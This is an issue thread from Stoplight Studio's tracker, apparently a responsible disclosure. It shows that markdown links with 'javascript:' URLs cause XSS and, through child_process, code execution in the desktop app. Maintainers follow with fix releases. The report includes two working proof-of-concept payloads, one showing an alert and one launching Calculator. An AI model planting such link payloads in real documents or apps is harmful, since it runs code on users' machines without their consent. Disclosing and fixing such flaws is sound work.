### ISSUE TITLE
XSS and RCE by link click.

### ISSUE THREAD

**Issue by ooooooo-q** [stoplightio/studio#542]
**Describe the bug**
Since `javascript:` can be written for the link in markdown, XSS occurs and RCE is possible.

**To Reproduce**

1. Write the following text in the description or file.
2. Clicking the link in the preview will run javascript.

```
[xss](javascript:alert(location))


[call calc](javascript:window.require('child_process').execFile('/System/Applications/Calculator.app/Contents/MacOS/Calculator',function(){}))
```

**Expected behavior**
Expected not to execute javascript.

**Screenshots**
<img width="1188" alt="html" src="https://user-images.githubusercontent.com/395584/107606118-7fbe8600-6c78-11eb-9e9c-8f575a679696.png">
<img width="592" alt="open_calc" src="https://user-images.githubusercontent.com/395584/107606133-88af5780-6c78-11eb-8656-e2820b84133d.png">

**Environment (remove any that are not applicable):**
 - Studio version: 2.2.0-stable.5379.git-75c5189
 - OS: Mac

**Comment by P0lip** [comment]
Hey!
Thanks a lot for the report.
I created 2 PRs addressing the issue
- https://github.com/stoplightio/markdown/pull/46
- https://github.com/stoplightio/markdown-viewer/pull/76

if everything goes smoothly, they should be out later today.

**Comment by wmhilton** [comment]
XSS fix deployed to production. Desktop apps currently compiling.

**Comment by wmhilton** [comment]
Fixed in Studio Nightly: https://github.com/stoplightio/studio-nightly/releases/tag/v2.3.0-stable.5448.git-f63f57f

Studio Stable currently compiling.

**Comment by wmhilton** [comment]
Fixed in Studio Desktop 2.3.0: https://github.com/stoplightio/studio/releases/tag/v2.3.0-stable.5448.git-f63f57f
